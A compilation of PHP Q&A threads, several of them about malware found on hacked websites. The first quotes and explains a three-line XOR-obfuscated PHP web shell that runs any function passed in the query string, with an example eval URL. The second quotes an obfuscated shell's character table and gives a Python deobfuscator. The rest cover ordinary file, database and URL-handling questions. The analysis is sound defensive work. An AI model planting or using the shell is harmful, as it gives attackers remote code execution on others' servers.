Is that some kind of PHP backdoor - php

Hi, I found this code in my website files. Is this some kind of backdoor? Can someone explain this code line by line?
<? $_="{";
$_=($_^"<").($_^">").($_^"/");?>
<?=${'_'.$_}["_"](${'_'.$_}["__"]);?>

Yes, this is malicious code.
Before spending any time looking at it, you should immediately take the site offline and replace it with a known-good copy, e.g. a backup or the official release. You should also make sure everything on your server is up to date and change your admin passwords. The fact that this code is there means your code was already compromised.
To confirm I'm not being over-dramatic, here's how the code works:
The first two lines generate a string containing the letters 'GET' by using bitwise XOR operations.
The third line then adds an '_' at the beginning, and executes $_GET["_"]($_GET["__"]);, echoing the result with <?=
This allows the attacker to access the page with a query string where _ is a function name and __ is its argument; PHP will run the function and display the result.
This in turn allows them to run any code they like, because they can just go to /yourcompromisedpage.php?_=eval&__=anyPHPcodeatall();
But to reiterate, the above is only to satisfy curiosity; this is a case where you should "shoot first, ask questions later". As soon as you've identified the code shouldn't be there, assume you've been compromised.

Related

Something seems to fail after 1622 characters(null values)

I'm having this issue with the JSONAPI for minecraft. http://mcjsonapi.com/
I am trying to use the method "files.write" or "setFileContents" to replace the contents of a file. The website states this about the method.
Pretty simple. Just rewrites the file, right? Yeah, but this is proving to be more difficult than I thought. At first attempt, I was trying to set 3450 characters to the file "groups.yml" on the minecraft server. Here's the code I ran in PHP:
var_dump(
$api->call("files.write", array("plugins/GroupManager/worlds/world/groups.yml", (string)$yaml))
);
The var_dump is supposed to either return a success statement or an error describing what went wrong. But instead all I get is "null". This isn't right, and I know $yaml is being cast to a string, which isn't the issue. So I decide to start testing around. After much testing, I find that the character length of what I can set is exactly 1622. Adding another space or anything causes null; otherwise, it works. This is the modified file that is below 1622 characters I tested with.
So great, you found the issue, right? No, I didn't. I thought 1622 was an odd number to stop working, so I did some further testing. I tried to set 3000 characters I generated from just smashing my keyboard, and it worked! So what's going on here?
This and this works, but this doesn't. Why is this? This app called Adminium runs this exact API, and includes a file management system inside the app which I am assuming uses the same methods I am using, but it doesn't have a problem.
I have a forum post here that I also asked on, and still haven't gotten to an answer yet.

decode a malware found on server obfuscated like a array of characters in PHP

Today I've found a malware on one site, I have deleted it, of course, and everything is ok, but in order to understand where it comes from, I would like to understand its logic, but it is encoded, in a quite easy way. At the beginning of the file I see:
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
This is used then in all the rest of the file, as a dictionary of characters, from now on, there are all assignments like this:
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
Does anyone have a clue on how I can decode this (without infecting a server of mine, of course), or at least the name of this type of encryption? Just to know if I can find something on the web.
If someone is interested, I can post the rest of the file, I found it odd.
Update: the file is actually a malicious shell hack. If you find it on your server, delete it and contact your sysadmin.
It is obfuscating the phrase "error_reporting"
<?php
$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
echo $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];
$GLOBALS['rpdxi45'] is storing a string constructed from the characters of the string held in $i96.
Echoing $GLOBALS['rpdxi45'] will show you the string that has been constructed.
See here: http://ideone.com/Jy1uty
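The two obfuscation tricks seen on this page, the XOR-built "GET" string from the "Is that some kind of PHP backdoor" thread above and the character-table string indexed one position at a time in this question, can both be undone offline without executing the file. The following Python script is an added example written for this page, not code from either thread; it embeds the two obfuscated lines from this question as constructed sample input, applies PHP's double-quoted-string escape rules so the table decodes exactly as PHP would see it (the \$, \t, \r, \n and \\ sequences change its indexing), and rewrites each $i96[n].$i96[m] chain into the literal it spells out. The function names are my own.

```python
import re

# Constructed sample: the two obfuscated PHP lines quoted in the thread above,
# kept verbatim as PHP source (escape sequences not yet applied).
OBFUSCATED_SOURCE = r'''$i96="QU~T<`_YM82iAN>/v#s\"'q#tZFjJX6a\tcI)yS^boD.\$du|3\rWw=rC!;[4*P5LVkB?%19m:p7 -zK,gOl{Efx]0R}&h+\n\\(enGH";
$GLOBALS['rpdxi45'] = $i96[94].$i96[51].$i96[51].$i96[39].$i96[51].$i96[6].$i96[51].$i96[94].$i96[70].$i96[39].$i96[51].$i96[23].$i96[11].$i96[95].$i96[77];'''

# --- Trick 1: $_="{"; $_=($_^"<").($_^">").($_^"/");  -> 'GET' ---

def xor_build(seed: str, keys: str) -> str:
    """PHP XORs strings byte by byte; a one-byte seed XORed against each key
    byte in turn, concatenated, yields the hidden word."""
    return ''.join(chr(ord(seed) ^ ord(k)) for k in keys)

# --- Trick 2: a "dictionary" string read one index at a time ---

_SIMPLE_ESCAPES = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'e': '\x1b',
                   'f': '\f', '\\': '\\', '$': '$', '"': '"'}

def php_dq_unescape(raw: str) -> str:
    """Apply PHP double-quoted escapes (\\n, \\t, \\$, \\", octal, \\xHH).
    Unknown escapes stay verbatim, as in PHP. Variable interpolation is not
    performed; the sample table escapes its only "$" as \\$."""
    out, i = [], 0
    while i < len(raw):
        ch = raw[i]
        if ch != '\\' or i + 1 == len(raw):
            out.append(ch)
            i += 1
            continue
        nxt = raw[i + 1]
        if nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
        elif nxt in '01234567':
            m = re.match(r'[0-7]{1,3}', raw[i + 1:])
            out.append(chr(int(m.group(), 8) & 0xFF))
            i += 1 + len(m.group())
        elif nxt == 'x' and re.match(r'[0-9A-Fa-f]', raw[i + 2:i + 3]):
            m = re.match(r'[0-9A-Fa-f]{1,2}', raw[i + 2:])
            out.append(chr(int(m.group(), 16)))
            i += 2 + len(m.group())
        else:
            out.append('\\' + nxt)
            i += 2
    return ''.join(out)

_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
_CHAIN = re.compile(r'\$(\w+)\[\d+\](?:\s*\.\s*\$\1\[\d+\])*')

def extract_tables(src: str) -> dict:
    """Collect every $name="..." assignment as a decoded lookup table."""
    return {m.group(1): php_dq_unescape(m.group(2)) for m in _ASSIGN.finditer(src)}

def php_sq(s: str) -> str:
    """Render a string as a PHP single-quoted literal."""
    return "'" + s.replace('\\', '\\\\').replace("'", "\\'") + "'"

def resolve_index_chains(line: str, tables: dict) -> str:
    """Replace $i96[94].$i96[51]... chains with the literal they spell out."""
    def repl(m):
        table = tables.get(m.group(1))
        idx = [int(n) for n in re.findall(r'\[(\d+)\]', m.group(0))]
        if table is None or any(i >= len(table) for i in idx):
            return m.group(0)   # unknown table or out-of-range index: leave untouched
        return php_sq(''.join(table[i] for i in idx))
    return _CHAIN.sub(repl, line)

def deobfuscate(src: str) -> str:
    """Decode every index chain in the source, line by line."""
    tables = extract_tables(src)
    return '\n'.join(resolve_index_chains(l, tables) for l in src.splitlines())

if __name__ == '__main__':
    print(xor_build('{', '<>/'))          # the 'GET' behind ${'_'.$_}
    print(deobfuscate(OBFUSCATED_SOURCE))
```

Run over the whole file instead of the two sample lines, the same pass turns every $GLOBALS['...'] assignment into a readable string, which is usually enough to see which function names the shell builds before deciding how it got onto the server.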

Using PHP to replace a line in a flat-file database

There are quite a few different threads about this similar topic, yet I have not been able to fully comprehend a solution to my problem.
What I'd like to do is quite simple, I have a flat-file db, with data stored like this -
$username:$worldLocation:$resources
The issue is I would like to have a submit data html page that would update this line based upon a search of the term using php
search db for - $worldLocation
if $worldLocation found
replace entire line with $username:$worldLocation:$updatedResources
I know there should be a fairly easy way to get this done but I am unable to figure it out at the moment, I will keep trying as this post is up but if you know a way that I could use I would greatly appreciate the help.
Thank you
I always loved C, and the functions that came into PHP from C.
Check out fscanf and fprintf.
These will make your life easier while reading/writing in a format. Like, say:
$filehandle = fopen("file.txt", "r"); // open for reading: mode "c" is write-only, so fscanf would read nothing
while ($values = fscanf($filehandle, "%s\t%s\t%s\n")) {
    list($a, $b, $c) = $values;
    // do something with $a, $b, $c
}
fclose($filehandle);
Also, there is no performance workaround for avoiding reading the entire file into memory -> changing one line -> writing the entire file. You have to do it.
This is as efficient as you can get, because you're most probably using native C code; I read somewhere that PHP just wraps C's functions in these cases.
You like the hard way so be it....
Make each line the same length. Add space, tab, capital X etc to fill in the blanks
When you want to replace the line, find it and as each line is of a fixed length you can replace it.
For speed and less hassle use a database (even SQLite)
If you're committed to the flat file, the simplest thing is iterating through each line, writing a new file & changing the one that matches.
Yeah, it sucks.
I'd strongly recommend switching over to a 'proper' database. If you're concerned about resources or the complexity of running a server, you can look into SQLite or Berkeley DB. Both of these use a database that is 'just a file', removing the issue of installing and maintaining a DB server, but still give you the ability to quickly & easily search, replace and delete individual records. If you still need the flat file for some other reason, you can easily write some import/export routines.
Another interesting possibility, if you want to be creative, would be to look at your filesystem as a database. Give each user a directory. In each directory, have a file for locations. In each file, update the resources. This means that, to insert a row, you just write to a new file. To update a file, you just rewrite a single file. Deleting a user is just nuking a directory. Sure, there's a bit more overhead in slurping the whole thing into memory.
Other ways of solving the problem might be to make your flat-file write-only, since appending to the end of a file is a trivial operation. You then create a second file that lists "dead" line numbers that should be ignored when reading the flat file. Similarly, you could easily "X" out the existing lines (which, again, is far easier than trying to update lines in a file that might not be the same length) and append your new data to the end.
Those second two ideas aren't really meant to be practical solutions as much as they are to show you that there's always more than one way to solve a problem.
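The "iterate through each line, write a new file, change the one that matches" approach from the answer above, as an added example in Python (not code from the thread, which is about PHP; the same steps map onto fopen/fgets/fwrite/rename). It assumes the line format from the question, username:worldLocation:resources, writes the new copy to a temporary file in the same directory and renames it over the original, so a crash mid-write can never leave a half-written database; the function names and the sample records in demo() are constructed for illustration.

```python
import os
import tempfile
from pathlib import Path

SEPARATOR = ':'   # the question's line format: $username:$worldLocation:$resources

def update_record(db_path, world_location: str, username: str, updated_resources: str) -> int:
    """Rewrite the flat file with every line whose location field matches replaced by
    username:world_location:updated_resources. Returns how many lines were replaced.
    The new copy goes to a temp file beside the original and is renamed over it; the
    rename is atomic on POSIX filesystems, so readers see the old file or the new one,
    never a truncated mix."""
    db_path = Path(db_path)
    for value in (username, world_location, updated_resources):
        if SEPARATOR in value or '\n' in value or '\r' in value:
            # a separator or line break inside a field would corrupt the record format
            raise ValueError("field values must not contain the separator or line breaks")
    replaced = 0
    fd, tmp_name = tempfile.mkstemp(dir=db_path.parent, prefix=db_path.name + '.')
    try:
        with os.fdopen(fd, 'w', encoding='utf-8') as out, db_path.open('r', encoding='utf-8') as src:
            for line in src:
                fields = line.rstrip('\r\n').split(SEPARATOR)
                if len(fields) == 3 and fields[1] == world_location:
                    line = SEPARATOR.join((username, world_location, updated_resources)) + '\n'
                    replaced += 1
                out.write(line)
            out.flush()
            os.fsync(out.fileno())      # data on disk before the rename makes it visible
        os.replace(tmp_name, db_path)
    except BaseException:
        try:
            os.unlink(tmp_name)         # never leave a stray temp file behind
        except FileNotFoundError:
            pass
        raise
    return replaced

def demo() -> tuple:
    """Constructed sample database; returns (replaced, file contents, replaced for a missing location)."""
    workdir = Path(tempfile.mkdtemp())
    db = workdir / 'worlds.txt'
    db.write_text('alice:earth:10\nbob:mars:5\ncarol:venus:7\n', encoding='utf-8')
    first = update_record(db, 'mars', 'bob', '42')
    after = db.read_text(encoding='utf-8')
    missing = update_record(db, 'pluto', 'dave', '1')
    return first, after, missing

if __name__ == '__main__':
    print(demo())
```

Behind a web form, two submissions can arrive at once and both read the old file; wrap the whole read, rewrite and rename in a lock (flock in PHP, fcntl.flock here) so one writer's change is not silently overwritten by the other's copy of the old data.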
OK... after a few hours' work, this example worked fine for me... I intended to code an editing tool and use it for password updates, and it did the trick! Not only does this page send an email to the user (sorry, address hardcoded to avoid posting additional code) with the new password, but it also edits the entry for the user and re-writes all file info in a new file... When done, it obviously swaps filenames, storing the old file as usuarios_old.txt.
Grab the code here (sorry, stackoverflow got VERY picky about code posting):
https://www.iot-argentina.xyz/edit_flat_databse.txt
Is that what you are looking for:
UPDATE `table` SET `field` = '$username:$worldLocation:$updatedResources' WHERE `field` = '$worldLocation';

Trouble with implementation of download code redeemer

I'm designing a website for a small indie record label and they've dropped a bombshell asking if I could implement a function where a user can enter a code to receive a digital download.
Is there a simple solution to doing this? I was thinking all I would need is an input field where the user can enter a code, it gets verified and then allows a download but it sounds too simple. Is this even possible with something like .php (complete beginner)?
I'm willing to learn or I would've packed it in already so any advice would be great. Thanks.
Edit:
Thanks to some great advice I was able to create this!
If you wanted to do it at a very simple level, it is not much more than you describe it to be. You would need to familiarize with PHP and MySQL or some other database, but it isn't too difficult to create.
You need to figure a few things out, such as how do you want to limit the codes, 3 downloads in the first 24 hours to allow for failed downloads, restrict it to IP, or strictly one full download. Since you have the list of the 1000 codes given, you will probably want to base your system around having codes pre-generated and inserted in the database, rather than having an algorithm that can validate the codes on the fly and then check for already used codes.
You would want to store the download(s) in a directory that is not accessible from the web, and the php script would validate the code, and if valid serve the download to the user.
You can probably look to the wordpress plugin's database structure for other ideas, but I think at the very least you would need:
download_code (the code itself, probably primary key or at least index)
download_file (optional, the name/path of the file this code allows them to download)
redeemed (0 if not redeemed, 1 if redeemed)
redemption_time (timestamp of the first, or last redemption based on your requirements)
download_count (how many times downloaded if allowing more than 1)
ip_address (ip address of the redeemer)
email_address (email address if you want to collect it, or give user the option)
download_url (the unique string for the download url. this could be one way to implement download verification beyond the code, but is not necessary)
You would then need to create an html page with the text box for entering the code, and any other optional data you wish to collect. The form would submit to your PHP script.
When the PHP script receives a form post, it would validate all of the data (i.e. email address if you were collecting it). Once all data is valid, you read from the database looking for a code matching what the user entered.
If no data was found with the code, send them back to the form to try re-entering it. If a record is found, you can check the redeemed value from the database and see if the code has been used or not. If it has, this is where you can use custom logic to decide if they are still within their download window, the ip address is the same, or whatever criteria you want to use to allow re-downloads.
If it has been redeemed, show an error message. If it is still okay to download, you can serve a download by reading the file and sending it to the browser see example #1 here.
At some point you will have to update your database to set the redeemed flag to 1 and update the other values such as timestamp and download count. You can either run this code before you serve the download, or you can run it after the download is served. In some cases if the download was cut off, the last portion of your script won't run and therefore won't update redeemed or download_count. This may or may not be what you want, so you can decide where you want to do the updating.
Eventually you can update it to include an administration panel, but in the beginning all configuration could be done within the php script or config file. And eventually you could update it to use flash or some other technology to download the file and show progress bars etc.
Hopefully that will give you some idea on whether or not you want to try to implement it. Otherwise you could always search php on Hotscripts to see if there is an already rolled standalone version of what you want.
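The flow described in the answer above (look up the code, check the redeemed flag and the re-download policy, serve the file from a directory outside the web root, then update the record) as an added example in Python with SQLite; it is not code from the thread. The table columns follow the field list above; the CodeRedeemer class, the 3-downloads-in-24-hours-from-the-same-IP policy and the sample codes in demo() are assumptions made for the example. Two details matter for security: the UPDATE is conditional on the download count that was read, so two requests redeeming the same code at the same moment cannot both be served, and the file path is checked to stay inside the download directory before anything is sent.

```python
import sqlite3
import time
from pathlib import Path

# Columns follow the field list in the answer; download_url is left out because this
# example streams the file itself rather than handing out a second secret.
SCHEMA = """
CREATE TABLE download_codes (
    download_code   TEXT PRIMARY KEY,
    download_file   TEXT NOT NULL,
    redeemed        INTEGER NOT NULL DEFAULT 0,
    redemption_time INTEGER,
    download_count  INTEGER NOT NULL DEFAULT 0,
    ip_address      TEXT,
    email_address   TEXT
)
"""

class CodeRedeemer:
    # Policy values are assumptions for the example: 3 downloads within 24 hours, same IP.
    def __init__(self, conn, download_dir, max_downloads=3, window_seconds=24 * 3600):
        self.conn = conn
        self.download_dir = Path(download_dir).resolve()   # a directory the web server does not expose
        self.max_downloads = max_downloads
        self.window_seconds = window_seconds
        conn.execute(SCHEMA)

    def add_codes(self, pairs):
        """Pre-generated codes, as the answer suggests, inserted as (code, file) pairs."""
        self.conn.executemany(
            "INSERT INTO download_codes (download_code, download_file) VALUES (?, ?)", pairs)
        self.conn.commit()

    def safe_path(self, file_name):
        """Refuse any download_file value that would resolve outside download_dir."""
        path = (self.download_dir / file_name).resolve()
        if self.download_dir not in path.parents:
            raise ValueError("download_file escapes the download directory")
        return path

    def redeem(self, code, ip, now=None):
        """Return the Path to serve, or None if the code is unknown or used up."""
        now = int(time.time() if now is None else now)
        code = code.strip().upper()          # codes are stored upper-case
        row = self.conn.execute(
            "SELECT download_file, redeemed, redemption_time, download_count, ip_address "
            "FROM download_codes WHERE download_code = ?", (code,)).fetchone()
        if row is None:
            return None
        download_file, redeemed, first_time, count, first_ip = row
        if redeemed:
            # Already used: allow a repeat only under the re-download policy.
            within_window = now - first_time <= self.window_seconds
            if not (first_ip == ip and within_window and count < self.max_downloads):
                return None
        # Conditional update: if another request bumped download_count since the SELECT,
        # rowcount is 0 and this request is refused instead of serving a second copy.
        cur = self.conn.execute(
            "UPDATE download_codes SET redeemed = 1, "
            "redemption_time = COALESCE(redemption_time, ?), "
            "download_count = download_count + 1, "
            "ip_address = COALESCE(ip_address, ?) "
            "WHERE download_code = ? AND download_count = ?",
            (now, ip, code, count))
        self.conn.commit()
        if cur.rowcount != 1:
            return None
        return self.safe_path(download_file)

def demo() -> dict:
    """Constructed walk-through: two codes, several attempts at fixed timestamps."""
    r = CodeRedeemer(sqlite3.connect(':memory:'), 'private-downloads')
    r.add_codes([('ABCD-1234', 'album.zip'), ('WXYZ-9999', 'single.mp3')])
    t0, ip, other_ip = 1_700_000_000, '203.0.113.5', '198.51.100.9'
    first = r.redeem('abcd-1234', ip, now=t0)              # first use: served
    second = r.redeem('ABCD-1234', ip, now=t0 + 600)       # same IP, inside the window: served
    third = r.redeem('ABCD-1234', ip, now=t0 + 700)
    fourth = r.redeem('ABCD-1234', ip, now=t0 + 800)       # over the 3-download limit: refused
    other = r.redeem('WXYZ-9999', ip, now=t0)
    other_ip_retry = r.redeem('WXYZ-9999', other_ip, now=t0 + 60)   # different IP: refused
    late = r.redeem('WXYZ-9999', ip, now=t0 + 2 * 24 * 3600)        # window elapsed: refused
    unknown = r.redeem('NOPE-0000', ip, now=t0)
    try:
        r.safe_path('../../etc/passwd')
        traversal_rejected = False
    except ValueError:
        traversal_rejected = True
    return {'served': [p.name if p else None for p in (first, second, third, fourth)],
            'other': other.name if other else None,
            'other_ip_retry': other_ip_retry, 'late': late, 'unknown': unknown,
            'traversal_rejected': traversal_rejected}

if __name__ == '__main__':
    print(demo())
```

The record is updated before the bytes are sent, which is the stricter of the two orderings the answer describes: an interrupted download costs the user one of their allowed attempts rather than leaving the code unredeemed.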

Code Igniter: allowing apostrophe in URI's while depending on Query Bindings for safety

I've been figuring out how to let apostrophes cross URIs.
I'm building a site that allows users to "create photo albums". I have a link that when clicked, it will load and display all the contents of a certain album. I'm using codeigniter so this page is called this way:
http://www.fourthdraft.com/index.php/admin/manageAlbumContents/dan's/91
admin = controller
managealbums = function
dan's (album name) = variable
As you know, CodeIgniter does not allow apostrophes (') in URIs. My problems are:
If I htmlspecialchars/htmlentities the album name it becomes &#xx; and those new characters are also not allowed.
If I urlencode it, it becomes %xx. Percent is allowed, but CodeIgniter urldecodes it before processing, so it just reverts back to an apostrophe.
I've tried making my own preg_replace ( ' => '~apos~' ), but I just find it inefficient, too many lines to run, and tedious since I have an 80% done website and the strings I have to replace are everywhere.
I've also considered using base64_encode. It takes more space but it does the job. Then again, the encoded version contains '=' which is also disallowed.
As much as possible I do not want to just add the apostrophe to the allowed characters list in CodeIgniter's config file. I believe they don't have it there for a reason. At the same time, I'm running out of options.
The reason for wanting to allow apostrophes is because in this context, it's bound to be used. For example, what if someone decided to put 'dan's birthday party' as an album name? It's bound to happen, and I'm pretty sure my users would complain. Even if I manage to convince them otherwise, what will I replace it with? dan_s birthday party? Looks wrong. Also, if Facebook can do it I should too. At the very least, if Facebook did it, then that means there's a way.
If you guys have any suggestions, fire away. Otherwise I'm wondering if it's OK (and safe) to just allow the apostrophe in the allowed URI characters. I know it's VERY dangerous for MySQL, which I use a lot, but I just remembered CodeIgniter's query binding variables automatically escape characters. I'm wondering if that would suffice and keep me safe.
Otherwise, please please please give me a good idea. I'm drained out
I like to believe that the days of mysql_query("SELECT * FROM table WHERE x={$_GET['val']}") are over. That being said, it's OK with any decent database library as long as you use parameter binding. So go ahead and use urlencode.
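What "OK with any decent database library as long as you use parameter binding" means in practice, as an added example in Python with SQLite (not code from the thread or from CodeIgniter): the album name dan's is url-encoded for the URI segment, decoded again as the framework would do, and then used in a query once by string interpolation and once as a bound parameter. The function names and the albums table are constructed for the example.

```python
import sqlite3
from urllib.parse import quote, unquote

def make_db():
    """Constructed sample table with album names that contain apostrophes."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE albums (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany("INSERT INTO albums (name) VALUES (?)",
                     [("dan's",), ("dan's birthday party",), ("holiday",)])
    conn.commit()
    return conn

def uri_segment_roundtrip(name: str) -> tuple:
    """urlencode the value for the URI segment and decode it again on the way in.
    quote() with safe='' encodes the apostrophe as %27 as well as '/'."""
    encoded = quote(name, safe='')
    return encoded, unquote(encoded)

def find_album_interpolated(conn, name: str):
    """The pattern the answer says should be over: the value is pasted into the SQL
    text, so the apostrophe in dan's ends the string literal early and the query
    no longer parses."""
    return conn.execute(f"SELECT id FROM albums WHERE name = '{name}'").fetchall()

def find_album_bound(conn, name: str):
    """Parameter binding: the value travels separately from the SQL text, so the
    apostrophe is plain data. This is what CodeIgniter's query bindings give you."""
    return conn.execute("SELECT id FROM albums WHERE name = ?", (name,)).fetchall()

def demo() -> tuple:
    """Walk the album name through the URI and both query styles."""
    conn = make_db()
    encoded, decoded = uri_segment_roundtrip("dan's")
    try:
        find_album_interpolated(conn, decoded)
        interpolated_failed = False
    except sqlite3.OperationalError:      # syntax error caused by the stray quote
        interpolated_failed = True
    return encoded, decoded, interpolated_failed, find_album_bound(conn, decoded)

if __name__ == '__main__':
    print(demo())
</```

The interpolated form fails loudly here only because the name happens to be harmless; the point of binding is that the query text is fixed before any user value is attached, so the apostrophe never changes what the statement means.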
